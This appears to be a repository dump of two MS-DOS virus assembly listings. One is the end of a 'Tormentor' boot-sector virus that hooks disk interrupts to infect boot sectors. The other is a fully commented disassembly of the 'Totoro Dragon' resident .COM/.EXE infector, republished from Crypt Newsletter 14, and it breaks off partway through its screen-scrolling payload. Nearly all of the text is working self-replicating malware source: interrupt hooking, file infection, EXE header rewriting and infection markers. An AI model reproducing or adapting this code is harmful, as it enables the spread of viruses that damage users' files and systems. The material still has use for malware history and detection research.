; db 'Tormentor Strain A - RABID Nat''nl Development Corp.'
|
||||
adc al,[bx+si]
|
||||
add [bx+si],al
|
||||
add [bx+di],al
|
||||
add dl,bh
|
||||
xor ax,ax ; Zero register
|
||||
mov ds,ax
|
||||
mov ss,ax
|
||||
mov bx,7C00h ; Pointer to boot segment
|
||||
mov sp,bx
|
||||
push ds
|
||||
data_14 db 53h
|
||||
dec word ptr ds:[413h]
|
||||
int 12h ; Put (memory size)/1K in ax
|
||||
mov cl,6
|
||||
shl ax,cl ; Shift w/zeros fill
|
||||
mov es,ax
|
||||
xchg ax,word ptr ds:[4Eh]
|
||||
mov word ptr ds:[7DABh],ax
|
||||
mov ax,128h
|
||||
xchg ax,word ptr ds:[4Ch]
|
||||
mov word ptr ds:[7DA9h],ax
|
||||
mov ax,es
|
||||
xchg ax,word ptr ds:[66h]
|
||||
mov word ptr ds:[7DAFh],ax
|
||||
mov ax,0BBh
|
||||
xchg ax,word ptr ds:[64h]
|
||||
mov word ptr ds:[7DADh],ax
|
||||
xor di,di ; Zero register
|
||||
mov si,bx
|
||||
mov cx,100h
|
||||
cld ; Clear direction
|
||||
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
|
||||
sti ; Enable interrupts
|
||||
push es
|
||||
mov ax,85h
|
||||
push ax
|
||||
retf
|
||||
push bx
|
||||
xor dl,dl ; Zero register
|
||||
call sub_2 ; (00FB)
|
||||
pop bx
|
||||
push ds
|
||||
pop es
|
||||
mov ah,2
|
||||
mov dh,1
|
||||
call sub_6 ; (011F)
|
||||
jc loc_2 ; Jump if carry Set
|
||||
push cs
|
||||
pop ds
|
||||
mov si,offset ds:[0Bh]
|
||||
mov di,offset ds:[7C0Bh]
|
||||
mov cx,2Bh
|
||||
cld ; Clear direction
|
||||
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
|
||||
jz loc_ret_3 ; Jump if zero
|
||||
loc_2:
|
||||
pop bx
|
||||
pop ax
|
||||
push cs
|
||||
mov ax,0AFh
|
||||
push ax
|
||||
|
||||
loc_ret_3:
|
||||
retf ; Return far
|
||||
read_error:
|
||||
push cs
|
||||
pop ds
|
||||
mov si,1DBh
|
||||
call sub_1 ; (00DA)
|
||||
xor ah,ah ; Zero register
|
||||
int 16h ; Keyboard i/o ah=function 00h
|
||||
; get keybd char in al, ah=scan
|
||||
xor ax,ax ; Zero register
|
||||
int 13h ; Disk dl=drive a ah=func 00h
|
||||
; reset disk, al=return status
|
||||
push cs
|
||||
pop es
|
||||
mov bx,offset ds:[200h]
|
||||
mov cx,6
|
||||
xor dx,dx ; Zero register
|
||||
mov ax,201h
|
||||
int 13h ; Disk dl=drive a ah=func 02h
|
||||
; read sectors to memory es:bx
|
||||
jc read_error ; Jump if carry Set
|
||||
mov cx,0FF0h
|
||||
mov ds,cx
|
||||
jmp dword ptr cs:data_16
|
||||
|
||||
;
|
||||
; Insert Tormentor endp here...
|
||||
;
|
||||
;tormentor endp
|
||||
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_1 proc near
|
||||
loc_5:
|
||||
mov bx,7
|
||||
cld ; Clear direction
|
||||
lodsb ; String [si] to al
|
||||
or al,al ; Zero ?
|
||||
jz loc_ret_9 ; Jump if zero
|
||||
jns loc_6 ; Jump if not sign
|
||||
xor al,0D7h
|
||||
or bl,88h
|
||||
loc_6:
|
||||
cmp al,20h
|
||||
jbe loc_7 ; Jump if below or =
|
||||
mov cx,1
|
||||
mov ah,9 ;
|
||||
int 10h ; Video display ah=functn 09h
|
||||
; set char al & attrib bl @curs
|
||||
loc_7:
|
||||
mov ah,0Eh
|
||||
int 10h ; Video display ah=functn 0Eh
|
||||
; write char al, teletype mode
|
||||
jmp short loc_5 ; (00DA)
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_2:
|
||||
mov bx,200h
|
||||
mov cx,2
|
||||
mov ah,cl
|
||||
call sub_5 ; (011D)
|
||||
mov cx,2709h
|
||||
xor byte ptr es:[bx],0FDh
|
||||
jz loc_8 ; Jump if zero
|
||||
mov cx,4F0Fh
|
||||
loc_8:
|
||||
jmp short loc_ret_9 ; (0127)
|
||||
nop
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_3:
|
||||
mov ah,2
|
||||
mov bx,200h
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_4:
|
||||
mov cx,1
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_5:
|
||||
mov dh,0
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_6:
|
||||
mov al,1
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_7:
|
||||
pushf ; Push flags
|
||||
call dword ptr cs:data_15
|
||||
|
||||
loc_ret_9:
|
||||
retn
|
||||
sub_1 endp
|
||||
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push es
|
||||
push ds
|
||||
push si
|
||||
push di
|
||||
pushf ; Push flags
|
||||
push cs
|
||||
pop ds
|
||||
cmp dl,1
|
||||
ja loc_11 ; Jump if above
|
||||
and ax,0FE00h
|
||||
jz loc_11 ; Jump if zero
|
||||
xchg al,ch
|
||||
shl al,1 ; Shift w/zeros fill
|
||||
add al,dh
|
||||
mov ah,9
|
||||
mul ah ; ax = reg * al
|
||||
add ax,cx
|
||||
sub al,6
|
||||
cmp ax,6
|
||||
ja loc_11 ; Jump if above
|
||||
push cs
|
||||
pop es
|
||||
call sub_3 ; (0115)
|
||||
jc loc_10 ; Jump if carry Set
|
||||
mov di,offset data_14
|
||||
mov si,offset ds:[243h]
|
||||
mov cx,0Eh
|
||||
std ; Set direction flag
|
||||
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to
|
||||
; es:[di]
|
||||
jz loc_11 ; Jump if zero
|
||||
sub si,cx
|
||||
sub di,cx
|
||||
mov cl,33h ; '3'
|
||||
rep movsb ; Rep when cx >0 Mov [si] to
|
||||
; es:[di]
|
||||
call sub_2 ; (00FB)
|
||||
push cx
|
||||
push bx
|
||||
call sub_3 ; (0115)
|
||||
mov ah,3
|
||||
xor bx,bx ; Zero register
|
||||
call sub_4 ; (011A)
|
||||
pop bx
|
||||
pop cx
|
||||
jc loc_10 ; Jump if carry Set
|
||||
mov dh,1
|
||||
mov ah,3
|
||||
call sub_6 ; (011F)
|
||||
loc_10:
|
||||
xor ax,ax ; Zero register
|
||||
call sub_7 ; (0121)
|
||||
loc_11:
|
||||
mov ah,4
|
||||
int 1Ah ; Real time clock ah=func 04h
|
||||
; read date cx=year, dx=mon/day
|
||||
cmp dh,9
|
||||
jne not_month ; Jump if not equal
|
||||
mov si,1B1h
|
||||
call sub_1 ; (00DA)
|
||||
not_month:
|
||||
popf ; Pop flags
|
||||
pop di
|
||||
pop si
|
||||
pop ds
|
||||
pop es
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
jmp dword ptr cs:data_15
|
||||
data_15 dd 0C602EC59h
|
||||
data_16 dd 0F000E6F2h
|
||||
esc 2,ch ; coprocessor escape
|
||||
and [bp+di-4141h],al
|
||||
movsb ; Mov [si] to es:[di]
|
||||
idiv word ptr [bp-85Ch] ; ax,dxrem=dx:ax/data
|
||||
xchg ax,si
|
||||
mov si,offset ds:[0B4A5h]
|
||||
mov ax,0DAA7h
|
||||
esc 5,[bx+si] ; coprocessor escape
|
||||
db 'IO SYSMSDOS SYS', 0Dh, 0Ah
|
||||
db 'Non-system disk or disk error', 0Dh
|
||||
db 0Ah
|
||||
add [bx+si],al
|
||||
push bp
|
||||
; jmp cont
|
||||
|
||||
; db 'Tormentor Strain A - RABID Nat''nl Development Corp.'
|
||||
stosb
|
||||
;cont: stosb ; Store al to es:[di]
|
||||
|
||||
tormentor endp
|
||||
|
||||
quit: mov ax,4c00h
|
||||
int 21h
|
||||
|
||||
|
||||
code_seg ends
|
||||
end start
|
||||
|
||||
|
|
@ -0,0 +1,713 @@
|
|||
;TOTORO DRAGON disassembly. Included, for your pleasure, in Crypt
|
||||
;Newsletter 14. Profuse thanks to Stormbringer, wherever he is.
|
||||
|
||||
;***************************************************************************
|
||||
;* The Totoro Dragon Virus from Taiwan *
|
||||
;***************************************************************************
|
||||
;* This virus is a fairly simple resident .EXE/.COM infector. It goes *
|
||||
;*resident by re-executing the infected file and using Int 21, function 31.*
|
||||
;*When it infects a .COM, it puts itself at the beginning of the file and *
|
||||
;*starts the host at an offset of 600h (700h in memory), giving the virus *
|
||||
;*an effective length of 1536 bytes, plus an extra 4 bytes for its marker *
|
||||
;*at the end ("YTIT"). It infects .EXE files using the "standard" method. *
|
||||
;*While it does save file attributes, the time and date change when a file *
|
||||
;*is infected. The virus activates on Saturdays. When active, it installs*
|
||||
;*an Int 08 (Timer click) handler that counts to 0CCCh, then shoves the *
|
||||
;*text off the screen and prints the following in the upper left-hand *
|
||||
;*corner: *
|
||||
;* *
|
||||
;* ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ· *
|
||||
;* º Totoro Dragon º *
|
||||
;* ºHello! I am TOTORO CATº *
|
||||
;* º Written by Y.T.J.C.T º *
|
||||
;* º in Ping Tung. TAIWAN º *
|
||||
;* º Don't Worry,be Happy º *
|
||||
;* ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ *
|
||||
;* *
|
||||
;*It then restarts the counter and does it again. Other that this effect, *
|
||||
;*the virus seems relatively harmless. *
|
||||
;* *
|
||||
;* *
|
||||
;* Disassembly by Stormbringer *
|
||||
;***************************************************************************
|
||||
.model tiny
|
||||
.radix 16
|
||||
.code
|
||||
org 100h
|
||||
|
||||
start:
|
||||
jmp short COM_Entry_Point
|
||||
nop
|
||||
;***************************************************************************
|
||||
;* Data Tables *
|
||||
;***************************************************************************
|
||||
File_Size_Off dw 5
|
||||
File_Size_Seg dw 0
|
||||
TSR_DAT dw 4262h
|
||||
DS_Save dw 0F21h
|
||||
ES_Save dw 0F21h
|
||||
File_Attribs dw 20h
|
||||
IP_Save dw 0
|
||||
CS_Save dw 0F99
|
||||
SP_Save dw 0
|
||||
SS_Save dw 0
|
||||
File_Type db 'C'
|
||||
|
||||
Wasted_Space db 0, 0, 0 ;?
|
||||
|
||||
;********************************************
|
||||
; EXE_Header ;
|
||||
;********************************************
|
||||
EXE_Sig db 'MZ'
|
||||
Last_Page_Len dw 14h
|
||||
EXE_Size dw 5
|
||||
Rel_Tbl_Items dw 0
|
||||
Header_Size dw 20h
|
||||
Minalloc dw 0
|
||||
Maxalloc dw 0ffff
|
||||
Init_SS dw 1
|
||||
Init_SP dw 700h
|
||||
Checksum dw 0
|
||||
Init_IP dw 91h
|
||||
Init_CS dw 1
|
||||
First_Rel dw 001Eh
|
||||
Overlay_Num dw 0
|
||||
;********************************************
|
||||
|
||||
CS_Store dw 0
|
||||
Command db 'COMMAND.COM', 0
|
||||
db 00h, 80h, 00h
|
||||
ES_Store_1 dw 0F21h
|
||||
dw 5Ch
|
||||
ES_Store_2 dw 0F21h
|
||||
dw 6Ch
|
||||
ES_Store_3 dw 0F21h
|
||||
File_Handle dw 5
|
||||
|
||||
Buffer_For_Checks db 0
|
||||
db 4Ch,0CDh, 21h
|
||||
|
||||
File_Name_Off dw 469h
|
||||
File_Name_Seg dw 0DF5h
|
||||
db 0
|
||||
Mem_Seg dw 0F93h
|
||||
IP_24 dw 156h
|
||||
CS_24 dw 0DF5h
|
||||
|
||||
;************************************************************************
|
||||
;* Virus Entry Point #1 (COM) *
|
||||
;************************************************************************
|
||||
COM_Entry_Point:
|
||||
mov ax,0F1F1h ;Is the virus in memory?
|
||||
int 21h
|
||||
mov cs:CS_Store,0
|
||||
mov cs:[ES_Save],es
|
||||
cmp ax,0F1F1h ;AX preserved?
|
||||
je Already_Installed ;Same? go Already_Installed
|
||||
jmp Install_Virus ;Not In Mem? go Install_Virus
|
||||
|
||||
Already_Installed: ;Restore control to host file (COM)
|
||||
mov ax,cs
|
||||
mov es,ax ;ES = DS = CS
|
||||
mov ds,ax
|
||||
mov ah,0CBh ;Restore Control
|
||||
mov si,700h ;Offset of host in file
|
||||
mov di,100h ;Original offset of host
|
||||
mov cx,cs:[File_Size_Off] ;Size of host file
|
||||
|
||||
int 21h ;Call internal routine to restore control
|
||||
;to host .COM file.
|
||||
|
||||
;************************************************************************
|
||||
;* Virus Entry Point #2 (EXE) *
|
||||
;************************************************************************
|
||||
EXE_Entry_Point:
|
||||
mov ax,cs
|
||||
sub ax,10h
|
||||
push ax
|
||||
mov ax,offset After_Jump
|
||||
push ax
|
||||
retf ;Jump to After_Jump with
|
||||
;original .COM offsets.
|
||||
After_Jump:
|
||||
mov cs:[ES_Save],es
|
||||
mov cs:[DS_Save],ds
|
||||
mov ax,0F1F1h
|
||||
int 21h
|
||||
cmp ax,0F1F1h ;Check if installed.
|
||||
jne Get_New_Seg ;Nope, Install....
|
||||
|
||||
cli
|
||||
mov ax,cs:[SS_Save] ;Yes, restore host regs
|
||||
add ax,10h
|
||||
mov bx,es
|
||||
add ax,bx
|
||||
mov ss,ax
|
||||
mov sp,cs:[SP_Save]
|
||||
sti
|
||||
|
||||
mov ax,cs:[CS_Store]
|
||||
mov bx,es
|
||||
add ax,bx
|
||||
add ax,10h
|
||||
mov word ptr cs:[IP_Save+2],ax
|
||||
jmp dword ptr cs:[IP_Save] ;Restore Control to
|
||||
;.EXE host.
|
||||
|
||||
Get_New_Seg:
|
||||
push es ;For later RETF
|
||||
xor ax,ax
|
||||
mov ds,ax ;DS = 0
|
||||
|
||||
;****************************************************************************
|
||||
;*NOTE: From 0:200 to 0:400 there is some "empty" space, as it is the upper *
|
||||
;* (unused) part of the interrupt tables. This virus uses the top three*
|
||||
;* bytes, i.e. the INT 99 entry, to run a repnz movsb command followed *
|
||||
;* by a retf. This is to copy the virus to a new segment in memory and*
|
||||
;* jump to it. *
|
||||
;****************************************************************************
|
||||
|
||||
mov word ptr ds:[3fdh],0A4F3h ;repnz movsb
|
||||
mov byte ptr ds:[3ffh],0CBh ;retf
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
mov si,100h
|
||||
mov di,si ;Copy virus to new segment
|
||||
mov cx,600h ;and "RETF" to
|
||||
mov ax,offset Install_Virus ;Install_Virus in new copy
|
||||
push ax
|
||||
db 0EAh,0FDh, 03h, 00h, 00h ;Jump far 0:3FDh
|
||||
|
||||
Install_Virus:
|
||||
cli ;Disable interrupts
|
||||
push cs
|
||||
pop ds
|
||||
mov ah,2Ah
|
||||
int 21h ;Get Day/Date
|
||||
|
||||
cmp al,6 ;Is it Saturday?
|
||||
jne Set_Int_21 ;Nope, don't activate, just
|
||||
mov ax,3508h ;infect files.
|
||||
int 21h ;Get Int 08 address
|
||||
|
||||
mov word ptr cs:[IP_08],bx
|
||||
mov word ptr cs:[CS_08],es
|
||||
mov dx,offset Int_08
|
||||
mov ax,2508h
|
||||
int 21h ;Set Int 08
|
||||
|
||||
Set_Int_21:
|
||||
mov ax,3521h
|
||||
int 21h ;Get Int 21 address
|
||||
|
||||
mov word ptr cs:[IP_21],bx
|
||||
mov word ptr cs:[CS_21],es
|
||||
mov dx,offset Int_21
|
||||
mov ax,2521h
|
||||
int 21h ;Set Int_21
|
||||
|
||||
mov es,cs:[ES_Save]
|
||||
cmp cs:[TSR_DAT],426Bh ;Second Execute?
|
||||
je Go_TSR ;Yep, go TSR
|
||||
|
||||
mov bx,1000h ;Nope, set up for second exec.
|
||||
mov ah,4Ah
|
||||
int 21h ;Change Mem Allocation
|
||||
;to 64k.
|
||||
|
||||
mov es,es:[2ch] ;Environment string
|
||||
xor di,di
|
||||
xor al,al
|
||||
mov cx,7FFFh
|
||||
|
||||
Find_Filename: ;Search Environment for
|
||||
repne scasb ;filename of host.
|
||||
cmp es:[di],al
|
||||
loopnz Find_Filename
|
||||
|
||||
add di,3 ;Skip drive designator
|
||||
;i.e. "C:\" in
|
||||
;"C:\Infected.EXE"
|
||||
mov dx,di
|
||||
|
||||
push es
|
||||
pop ds ;DS:DX = host filename
|
||||
push cs
|
||||
pop es
|
||||
|
||||
cli ;Clears Ints (so none can
|
||||
;disrupt second execution
|
||||
;of virus)
|
||||
|
||||
mov ax,cs:[ES_Save]
|
||||
mov cs:[ES_Store_1],ax
|
||||
mov cs:[ES_Store_2],ax
|
||||
mov cs:[ES_Store_3],ax
|
||||
mov bx,144h
|
||||
mov ax,4B00h ;Re-Execute the file
|
||||
pushf
|
||||
call dword ptr cs:[IP_21] ;Call Int 21 to Execute file.
|
||||
|
||||
Go_TSR:
|
||||
mov ah,31h
|
||||
mov dx,71h
|
||||
int 21h ;Terminate and Stay Resident.
|
||||
|
||||
Int_21:
|
||||
pushf ;Push flags
|
||||
cmp ax,0F1F1h ;Is it an Install Check?
|
||||
jne Is_It_Execute ;No, Go Is_It_Execute
|
||||
mov ax,0F1F1h ;Yes, save value (unneccesary)
|
||||
popf
|
||||
iret ;Return to virus in program.
|
||||
|
||||
Is_It_Execute:
|
||||
cmp ax,4B00h ;Is it a Load & Execute call?
|
||||
jne Restore_Host ;Nope, continue on.
|
||||
call execute ;Infect the file if possible.
|
||||
jmp short Go_Int_21 ;And go to old Int 21 handler.
|
||||
nop
|
||||
Restore_Host:
|
||||
cmp ah,0CBh ;Is it a request to restore
|
||||
jne Go_Int_21 ;control to host?
|
||||
pop ax ax ;Pop flags + Old IP (not kept)
|
||||
mov word ptr cs:[IP_Save],100h
|
||||
pop ax
|
||||
mov word ptr cs:[IP_Save+2],ax
|
||||
rep movsb ;Restore Host to orig. Pos.
|
||||
popf ;Completely remove old Int call
|
||||
mov ax,0
|
||||
jmp dword ptr cs:[IP_Save] ;Jump to Host:100
|
||||
Go_Int_21:
|
||||
popf ; Pop flags
|
||||
|
||||
db 0ea ;Jump to Int 21
|
||||
IP_21 dw 040ebh
|
||||
CS_21 dw 0011
|
||||
|
||||
|
||||
execute:
|
||||
push es ds ax bx cx dx si di
|
||||
mov cs:[File_Name_Seg],ds
|
||||
mov cs:[File_Name_Off],dx
|
||||
mov ax,3524h ;Get Int 24 Address
|
||||
int 21h ;(Critical Error)
|
||||
|
||||
mov cs:[IP_24],bx
|
||||
mov cs:[CS_24],es
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,offset Int_24
|
||||
mov ax,2524h
|
||||
int 21h ;Set Int 24
|
||||
|
||||
mov ds,cs:[File_Name_Seg]
|
||||
mov si,cs:[File_Name_Off]
|
||||
|
||||
Name_Check:
|
||||
lodsb
|
||||
or al,al ;Is the first byte a zero?
|
||||
jnz Name_Check ;Nope, find end of string
|
||||
mov al,[si-2]
|
||||
and al,0DFh
|
||||
cmp al,4Dh ;'M'
|
||||
je Is_Com ;COM file, jump Is_Com
|
||||
cmp al,45h ;'E'
|
||||
je Is_EXE ;EXE file, jump Is_EXE
|
||||
jmp Clean_Up ;Neither? Go Clean_Up
|
||||
Is_Com:
|
||||
mov cs:[File_Type],'C' ;Save File type for later.
|
||||
jmp short Check_If_Command
|
||||
nop
|
||||
Is_EXE:
|
||||
mov cs:[File_Type],'E'
|
||||
|
||||
Check_If_Command:
|
||||
sub si,0Ch
|
||||
mov di,offset Command
|
||||
push cs
|
||||
pop es
|
||||
mov cx,0Bh ;Is it Command.COM?
|
||||
repe cmpsb
|
||||
jnz Start_Infect ;No, Jump Start_Infect
|
||||
Got_An_Error:
|
||||
jmp Clean_Up ;Is Command, get otta here.
|
||||
|
||||
Start_Infect:
|
||||
mov ds,cs:[File_Name_Seg]
|
||||
mov dx,cs:[File_Name_Off]
|
||||
mov ax,4300h
|
||||
int 21h ;Get Attribs
|
||||
|
||||
jc Got_An_Error
|
||||
mov cs:[File_Attribs],cx
|
||||
xor cx,cx
|
||||
mov ax,4301h
|
||||
int 21h ;Zero Attrib's for read/write
|
||||
|
||||
jc Got_An_Error
|
||||
mov ax,3D02h
|
||||
int 21h ;Open Read/Write
|
||||
|
||||
jnc Check_Infect ;Everything Fine? go Check_Infect
|
||||
jmp Reset_Attribs ;Couldn't Open, go Reset_Attribs
|
||||
|
||||
Check_Infect:
|
||||
mov bx,ax
|
||||
mov cs:[File_Handle],ax
|
||||
mov cx,0FFFFh
|
||||
mov dx,0FFFCh
|
||||
mov ax,4202h
|
||||
int 21h ;Move to 4 bytes from end
|
||||
|
||||
add ax,4
|
||||
mov cs:[File_Size_Off],ax
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,offset Buffer_For_Checks
|
||||
mov cx,4
|
||||
mov ah,3Fh
|
||||
int 21h
|
||||
;Read in Last 4 bytes of file
|
||||
push cs
|
||||
pop es
|
||||
mov cx,4
|
||||
mov si,offset Marker ;are last 4 bytes 'YTIT'?
|
||||
mov di,offset Buffer_For_Checks ;
|
||||
repe cmpsb
|
||||
jnz Check_Which_Type ;Not infected? Go Check_Which_Type
|
||||
jmp Close_File ;Infected? Go Close_File
|
||||
|
||||
Check_Which_Type:
|
||||
cmp cs:[File_Type],'C' ;Is it a .COM?
|
||||
je COM_Infect ;Yes, go COM_Infect
|
||||
jmp EXE_Infect ;No, go EXE_Infect
|
||||
|
||||
COM_Infect:
|
||||
mov ah,48h
|
||||
mov bx,1000h
|
||||
int 21h ;Allocate 64k of memory
|
||||
|
||||
jnc Load_In_File ;No Prob? Go Load_In_File
|
||||
jmp Close_File ;Otherwise, go Close_File
|
||||
|
||||
Load_In_File:
|
||||
mov cs:[Mem_Seg],ax
|
||||
mov bx,cs:[File_Handle]
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4200h
|
||||
int 21h ;Go to beginning of file
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
mov es,cs:[Mem_Seg]
|
||||
|
||||
mov si,100
|
||||
|
||||
mov di,si
|
||||
mov cx,700h
|
||||
rep movsb
|
||||
mov ds,cs:Mem_Seg
|
||||
mov cx,cs:[File_Size_Off]
|
||||
mov dx,700h
|
||||
mov ah,3Fh ;Load entire file to directly
|
||||
int 21h ;after virus.
|
||||
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4200h
|
||||
int 21h ;Move to the beginning of file
|
||||
|
||||
mov dx,100h
|
||||
mov cx,cs:[File_Size_Off]
|
||||
add cx,600h
|
||||
mov ah,40h
|
||||
int 21h ;Write entire file back to disk
|
||||
|
||||
jc Go_Release_Mem
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4202h
|
||||
int 21h ;Move to end of file
|
||||
|
||||
mov cs:[File_Size_Seg],0 ;COM < 64k
|
||||
add ax,4 ;Add 4 for marker bytes
|
||||
mov cs:[File_Size_Off],ax ;Save file size
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,offset Marker
|
||||
mov cx,4
|
||||
mov ah,40h
|
||||
int 21h ;Write in marker 'YTIT'
|
||||
|
||||
Go_Release_Mem:
|
||||
jmp Release_Mem
|
||||
jmp Close_File
|
||||
|
||||
EXE_Infect:
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4200h
|
||||
int 21h ;Move to beginning of file
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
db 8dh,16h,1bh,01 ;lea dx,cs:[11Bh]
|
||||
mov cx,1Ch
|
||||
mov ah,3Fh
|
||||
int 21h ;Read in .EXE header
|
||||
|
||||
Save_Header_NFO:
|
||||
cli ;clear ints
|
||||
mov ax,cs:[Init_CS]
|
||||
mov cs:[CS_Store],ax ;Save old CS
|
||||
mov ax,cs:[Init_IP]
|
||||
mov word ptr cs:[IP_Save],ax ;Save old IP
|
||||
mov ax,cs:[Init_SS]
|
||||
mov cs:[SS_Save],ax ;Save old SS
|
||||
mov ax,cs:[Init_SP]
|
||||
mov cs:[SP_Save],ax ;Save old SP
|
||||
sti ;restore ints
|
||||
|
||||
xor ax,ax
|
||||
cmp cs:[Last_Page_Len],0
|
||||
je Calculate_Exe_Header
|
||||
dec cs:[EXE_Size]
|
||||
|
||||
Calculate_Exe_Header: ;Long, drawn out way
|
||||
;to calculate new EXE header
|
||||
mov cx,200h
|
||||
xor dx,dx
|
||||
mov ax,cs:[EXE_Size]
|
||||
mul cx
|
||||
add ax,cs:[Last_Page_Len]
|
||||
add ax,0Fh
|
||||
adc dx,0
|
||||
and ax,0FFF0h
|
||||
mov cs:[File_Size_Off],ax
|
||||
mov cs:[File_Size_Seg],dx
|
||||
push dx ax dx ax
|
||||
xor dx,dx
|
||||
mov ax,cs:[Header_Size]
|
||||
mov cx,10h
|
||||
mul cx
|
||||
pop bx cx
|
||||
sub bx,ax
|
||||
sbb cx,dx
|
||||
xchg ax,bx
|
||||
xchg dx,cx
|
||||
mov cx,10h
|
||||
div cx
|
||||
mov cs:[Init_CS],ax
|
||||
mov cs:[Init_SS],ax
|
||||
mov cs:[Init_SP],700h
|
||||
mov cs:[Init_IP],offset EXE_Entry_Point-100
|
||||
pop ax dx
|
||||
push dx ax
|
||||
add ax,604h
|
||||
adc dx,0
|
||||
mov cx,200h
|
||||
div cx
|
||||
mov cs:Last_Page_Len,dx
|
||||
or dx,dx
|
||||
jz Rewrite_Header
|
||||
inc ax
|
||||
|
||||
Rewrite_Header:
|
||||
mov cs:[EXE_Size],ax
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov bx,cs:[File_Handle]
|
||||
mov ax,4200h
|
||||
int 21h ;Move back to beginning of file
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,offset EXE_Sig
|
||||
mov cx,1Ch
|
||||
mov ah,40h
|
||||
int 21h ;Write EXE header back to file
|
||||
|
||||
pop dx
|
||||
pop cx
|
||||
jc Close_File
|
||||
mov ax,4200h
|
||||
int 21h ;Go to end of host.
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,100
|
||||
mov cx,600h
|
||||
mov ah,40h
|
||||
int 21h ;Write Virus
|
||||
jc Close_File
|
||||
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4202h
|
||||
int 21h ;Go to end of file.
|
||||
|
||||
mov dx,offset Marker
|
||||
mov cx,4
|
||||
mov ah,40h
|
||||
int 21h ;Write marker byte.
|
||||
|
||||
jmp short Close_File
|
||||
nop
|
||||
Release_Mem:
|
||||
mov es,cs:Mem_Seg
|
||||
mov ah,49h
|
||||
int 21h ;Release Memory
|
||||
|
||||
Close_File:
|
||||
mov ah,3Eh
|
||||
mov bx,cs:[File_Handle]
|
||||
int 21h ;Close file.
|
||||
|
||||
Reset_Attribs:
|
||||
mov ds,cs:File_Name_Seg
|
||||
mov dx,cs:File_Name_Off
|
||||
mov cx,cs:File_Attribs
|
||||
mov ax,4301h
|
||||
int 21h ;Reset File attributes
|
||||
|
||||
Clean_Up:
|
||||
mov ds,cs:[CS_24] ;Restore Critical Error
|
||||
mov dx,cs:[IP_24]
|
||||
mov ax,2524h
|
||||
int 21h
|
||||
|
||||
pop di si dx cx bx ax ds es
|
||||
retn
|
||||
|
||||
|
||||
Int_24: ;Critical Error Handler
|
||||
xor ax,ax
|
||||
iret
|
||||
|
||||
Int_08: ;Timer Click Handler
|
||||
pushf
|
||||
inc cs:[Activation_Counter]
|
||||
cmp cs:[Activation_Counter],0CCCh
|
||||
jne Go_Int_08
|
||||
mov cs:[Activation_Counter],0 ;Reset Counter
|
||||
push ds es si di ax bx cx dx
|
||||
call Get_Mode
|
||||
call Scroll_Area
|
||||
call Print_Message
|
||||
pop dx cx bx ax di si es ds
|
||||
Go_Int_08:
|
||||
popf ; Pop flags
|
||||
db 0EA
|
||||
IP_08 dw 003Ch
|
||||
CS_08 dw 0D80h
|
||||
|
||||
Screen_Width dw 0
|
||||
Activation_Counter dw 1E0h
|
||||
|
||||
Get_Mode:
|
||||
mov ah,0Fh
|
||||
int 10h ;Get Video Mode
|
||||
|
||||
mov bx,0B000h ;Mode 7 Text Video Memory
|
||||
mov es,bx
|
||||
cmp al,7
|
||||
je In_Mode_7
|
||||
mov bx,0B800h ;Regular Text Video Memory
|
||||
In_Mode_7:
|
||||
mov es,bx
|
||||
mov ds,bx
|
||||
mov cs:[Screen_Width],4Fh
|
||||
|
||||
Setup_Screen:
|
||||
mov cx,19h
|
||||
mov bx,0
|
||||
Clear_Screen:
|
||||
push cx
|
||||
call Scroll_Line
|
||||
add bx,0A0h
|
||||
pop cx
|
||||
loop Clear_Screen
|
||||
|
||||
dec cs:[Screen_Width]
|
||||
jnz Setup_Screen
|
||||
retn
|
||||
|
||||
Scroll_Line: ;This subroutine clears the
|
||||
mov di,bx ;screen by scrolling the text
|
||||
mov si,bx ;straight off of the left
|
||||
add si,2 ;side.
|
||||
mov cx,cs:[Screen_Width]
|
||||
|
||||
Scroll_Sideways:
|
||||
lodsb
|
||||
stosb
|
||||
